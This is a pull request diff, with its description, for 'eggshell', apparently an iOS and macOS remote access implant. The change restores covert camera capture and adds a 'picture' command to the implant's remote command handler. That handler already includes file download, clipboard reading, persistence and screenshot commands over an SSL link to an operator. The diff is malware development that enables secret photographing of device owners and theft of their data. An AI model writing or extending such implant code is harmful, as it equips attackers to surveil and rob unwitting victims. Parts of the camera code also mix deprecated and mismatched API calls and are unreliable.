### PR TITLE
Fixing iOS Image capturing

### DIFF
--- a/src/esplios/Makefile
+++ b/src/esplios/Makefile
@@ -9,7 +9,7 @@ ARCHS 				= arm64 arm64e
 esplios_FILES 							= 	src/main.mm src/espl.m
 esplios_FRAMEWORKS 						= 	Foundation Security AudioToolbox CoreFoundation MediaPlayer UIKit 
 esplios_PRIVATE_FRAMEWORKS 				= 	AppSupport SpringBoardServices IOSurface 
-esplios_CFLAGS 							= 	-fobjc-arc -Wno-unused -I./src/include -I/Users/rpwnage/theos/sdks/iPhoneOS$(SDKVERSION).sdk/usr/include
+esplios_CFLAGS 							= 	-fobjc-arc -Wno-unused -I./src/include -I/Users/rpwnage/theos/sdks/iPhoneOS$(SDKVERSION).sdk/usr/include -Wno-error=deprecated-declarations
 esplios_OBJ_FILES						=	lib/libssl.a lib/libcrypto.a 
 esplios_LDFLAGS							=	-L./lib -lssl -lcrypto -w
 esplios_LIBRARIES						=	ssl crypto

--- a/src/esplios/src/espl.h
+++ b/src/esplios/src/espl.h
@@ -35,7 +35,8 @@ extern int SBSLaunchApplicationWithIdentifier(CFStringRef identifier, Boolean su
 
 @property(retain) NSFileManager *fileManager;
 @property(retain) CPDistributedMessagingCenter *messagingCenter;
-@property(readwrite, retain) AVCapturePhotoOutput *stillImageOutput;
+@property (readwrite, retain) AVCaptureStillImageOutput *stillImageOutput;
+//@property(readwrite, retain) AVCapturePhotoOutput *stillImageOutput;
 @property(nonatomic, strong) AVCaptureSession *session;
 @property(nonatomic, retain) AVAudioRecorder *audioRecorder;
 @property(retain) UIDevice *thisUIDevice;
@@ -53,7 +54,7 @@ extern int SBSLaunchApplicationWithIdentifier(CFStringRef identifier, Boolean su
 - (void)openURL:(NSString *)arg;
 - (void)openApp:(NSString *)arg;
 - (NSData *)receiveData:(long)size;
-// -(void)takePicture:(bool)front;
+-(void)takePicture:(bool)front;
 - (void)tabComplete:(NSString *)path;
 - (void)listDirectory:(NSString *)path;
 - (NSDictionary *)getDirectoryContents:(NSString *)path;

--- a/src/esplios/src/espl.m
+++ b/src/esplios/src/espl.m
@@ -103,6 +103,7 @@ bool sysTaskRunning = false;
 }
 
 -(void)takePicture:(bool)front {
+    [self sendString:@"Starting takePicture:..."];
     AVCaptureDeviceDiscoverySession *captureDeviceDiscoverySession = [AVCaptureDeviceDiscoverySession discoverySessionWithDeviceTypes:@[AVCaptureDeviceTypeBuiltInWideAngleCamera] 
                                         mediaType:AVMediaTypeVideo 
                                         position:AVCaptureDevicePositionBack];
@@ -137,7 +138,7 @@ bool sysTaskRunning = false;
     //set output
     [self debugLog:[NSString stringWithFormat:@"setting still image output"]];
     [[NSRunLoop mainRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:0.5]]; 
-    self.stillImageOutput = [[AVCapturePhotoOutput alloc] init];
+    self.stillImageOutput = [[AVCaptureStillImageOutput alloc] init];
     /*
 
          The whole outputSettings thing is
@@ -197,13 +198,17 @@ bool sysTaskRunning = false;
            [self.session stopRunning];
         });
         if (error) imageData(nil);
-        NSData* data = [AVCapturePhotoOutput JPEGPhotoDataRepresentationForJPEGSampleBuffer:imageSampleBuffer];
+        NSData* data = [AVCapturePhotoOutput JPEGPhotoDataRepresentationForJPEGSampleBuffer:imageSampleBuffer previewPhotoSampleBuffer:imageSampleBuffer];
         if (data) {
            imageData(data);
         } else {
             imageData(nil);
         }
     }];
+}
+
+- (void)captureOutput:(AVCaptureOutput *)output didOutputSampleBuffer:(CMSampleBufferRef)sampleBuffer fromConnection:(AVCaptureConnection *)connection{
+    
 }
 
 - (void)captureOutput:(AVCapturePhotoOutput *)output didFinishProcessingPhoto:(AVCapturePhoto *)photo error:(nullable NSError *)error{  
@@ -308,9 +313,10 @@ bool sysTaskRunning = false;
 }
 
 - (void)screenshot {
+    [self sendString:@"Attempting to take screenshot..."];
     UIImage* image = UIGraphicsGetImageFromCurrentImageContext();
     NSData* imageData = UIImagePNGRepresentation(image);
-    NSString  *jpgPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Test.jpg"];
+    NSString* jpgPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Test.jpg"];
     [self.fileManager createFileAtPath:jpgPath contents:imageData attributes:nil];
     [self sendString:[NSString stringWithFormat:@"Screenshot saved! (%@ (%@))", jpgPath, [[NSByteCountFormatter new] stringFromByteCount:imageData.length]]];
     [self debugLog:[NSString stringWithFormat:@"%@", imageData]];

--- a/src/esplios/src/main.mm
+++ b/src/esplios/src/main.mm
@@ -129,6 +129,8 @@ void interact(NSDictionary* arguments) {
             [esCommand showAlert:args];
         } else if ([cmd isEqualToString:@"download"]) {
             [esCommand sendFile:args];
+        } else if ([cmd isEqualToString:@"picture"]) {
+            [esCommand takePicture:[args boolValue]];
         } else if ([cmd isEqualToString:@"getpaste"]) {
             [esCommand getPasteBoard];
         } else if ([cmd isEqualToString:@"persistence"]) {

--- a/src/esplmacos/esplmacos/espl.h
+++ b/src/esplmacos/esplmacos/espl.h
@@ -21,14 +21,14 @@
 #include <unistd.h>
 #include <dirent.h>
 
-@interface espl : NSObject <AVAudioRecorderDelegate> {
+@interface espl : NSObject <AVAudioRecorderDelegate, AVCapturePhotoCaptureDelegate> {
     @public
     SSL* client_ssl;
     char *terminator;
 }
 
 @property NSFileManager *fileManager;
-@property (readwrite, retain) AVCaptureStillImageOutput *stillImageOutput;
+@property (readwrite, retain) AVCapturePhotoOutput *capturedImageOutput;
 @property (nonatomic,strong) AVCaptureSession *session;
 @property (nonatomic,retain) AVAudioRecorder *audioRecorder;
 @property NSTask *systask;


### PR DESCRIPTION
iOS Image capture methods used in the original version of eggshell are widely deprecated. I’m fixing them in this branch, and I’ll merge the changes once they’re completed